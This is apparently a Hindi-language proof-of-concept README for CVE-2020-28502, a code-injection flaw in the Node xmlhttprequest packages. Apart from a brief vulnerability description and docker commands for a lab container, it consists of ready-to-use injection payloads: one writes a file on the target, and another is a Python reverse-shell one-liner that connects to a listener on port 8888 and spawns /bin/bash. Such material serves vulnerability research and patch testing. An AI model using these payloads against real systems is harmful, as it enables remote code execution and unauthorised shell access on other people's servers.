
CVE-2020-28502 node-XMLHttpRequest RCE
यह xmlhttprequest पैकेज के 1.7.0 से पहले के संस्करणों को प्रभावित करता है; साथ ही xmlhttprequest-ssl पैकेज के सभी संस्करणों को। बशर्ते अनुरोध सिंक्रोनस रूप से भेजे जाते हैं (xhr.open पर async=False), xhr.send में प्रवाहित होने वाला दुर्भावनापूर्ण उपयोगकर्ता इनपुट मनमाना कोड इंजेक्ट और चलाने का कारण बन सकता है।

$ docker build -t cve-2020-28502 .
$ docker run --rm -p 3000:3000 cve-2020-28502

पेलोड सबमिट करें
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//
$ nc -l 8888
ip पता (192.168.0.25) को अपने स्थानीय ip पते में बदलें
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//